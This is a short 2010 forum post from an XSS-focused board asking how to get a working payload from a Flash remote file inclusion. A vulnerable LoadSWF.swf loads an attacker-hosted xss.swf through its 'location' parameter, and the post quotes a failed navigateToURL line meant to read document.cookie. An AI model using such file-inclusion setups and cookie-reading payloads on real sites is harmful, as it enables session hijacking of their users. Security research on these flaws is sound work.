Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
flash RFI
Posted by: dwhite
Date: July 24, 2010 02:00AM

The situation:

hxxp://domain.com/LoadSWF.swf?location=http://domain2.com/xss.swf

LoadSWF is AS3 and uses Loader.load() to load the external swf file.

With xss.swf as AS3 and using Security.allowDomain("domain.com"); and a crossdomain.xml file, LoadSWF will load xss.swf.

The question is what the payload can be.

I tried:

navigateToURL(new URLRequest("javascript:alert(document.cookie);"),"_top");

But that produced security error #2051.



Edited 1 time(s). Last edit at 07/24/2010 03:34AM by dwhite.

Options: ReplyQuote


Sorry, only registered users may post in this forum.